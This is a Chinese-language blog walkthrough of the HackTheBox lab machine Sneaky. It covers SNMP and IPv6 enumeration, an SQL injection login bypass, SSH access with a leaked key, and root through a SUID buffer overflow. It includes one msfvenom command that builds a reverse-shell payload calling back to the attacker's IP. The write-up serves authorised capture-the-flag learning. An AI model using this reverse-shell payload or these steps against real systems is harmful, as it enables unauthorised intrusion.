No.101-HackTheBox-Linux-Sneaky-Walkthrough渗透学习

**

HackTheBox-Linux-Sneaky-Walkthrough

**

靶机地址：https://www.hackthebox.eu/home/machines/profile/19
靶机难度：中级（5.0/10）
靶机发布日期：2017年10月29日
靶机描述：
Sneaky, while not requiring many steps to complete, can be difficult for some users. It explores enumeration through SNMP and has a beginner level buffer overflow vulnerability which can be leveraged for privilege escalation.

作者：大余
时间：2020-05-16

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.20…


Nmap扫描仅发现开放了Apache和SNMP两个服务…

80端口上没什么可用的信息…直接枚举爆破看看…

枚举发现了dev目录…

dev目录提供了此页面…通过利用burpsuit拦截尝试sql注入枚举爆破…




可看到通过尝试通用的sql注入代码…成功登录…

登录后获得了两个用户名信息：admin和thrasivoulos
以及rsa 的key，这里很熟悉吧…就在前面两三章就做了两次一模一样的环境…
思路就是利用rsa的key通过ssh服务访问到用户…从而在用户提权root…但是nmap只发现开放了http和snmp服务…未开放ssh服务？？
这里熟悉的小伙伴就知道，snmp关联着ipv6信息…可以参考：https://www.jianshu.com/p/dc2dc0222940

将key保存到本地…

利用snmpwalk命令来和snmp主机进行交换数据…
可以看到存在可用的IPv6接口信息…需要获得靶机的ipv6信息…


可以看到Enyx专门用来获取ipv6的信息工具…利用即可…

通过利用enyx获取了所有接口的ipv6信息…

检查发现…nmap扫描IPv6信息对方是开启了ssh的…那这就直接登录即可…

直接利用前面获取的信息量…成功登录了，并获得了user信息…（这里就不多说了，连续靶机都是类似环境）

直接通过LinEnum.sh枚举所有信息量…

在查看到SUID位时，resrwsr的chal程序存在异常…应该是缓冲区溢出提权了…（这里环境和前面一台靶机差不多…雷同，那台也是ssh登录后缓冲区溢出提权…那台是可以直接利用/bin/sh写入程序直接获得root…）

下载到本地分析…

这里直接快速了…做了太多缓冲区溢出了…获得了偏移量362…

命令：msfvenom -a x86 --platform -linux -p linux/x86/shell_reverse_tcp LHOST=10.10.14.51 LPORT=6666 -e x86/alpha_mixed -f python
这里我利用了msf生成的shell…也可以利用原生的shell简单…很多shell自行google


知道偏移量，在获取EIP即可提权…这里我编写的简单shell脚本nop是x90，直接对程序x/100x $esp-200发现了很多可以利用的EIP，这里的都可以利用…直接写入…

这里我利用了788的EIP，别的也试过也成功…或者不需要NOP的情况直接google /bin/sh源直接利用原生EIP提权也行…
成功注入shell提权root，获得了root.txt信息…

由于我们已经成功得到root权限查看user和root.txt，因此完成这台中级的靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。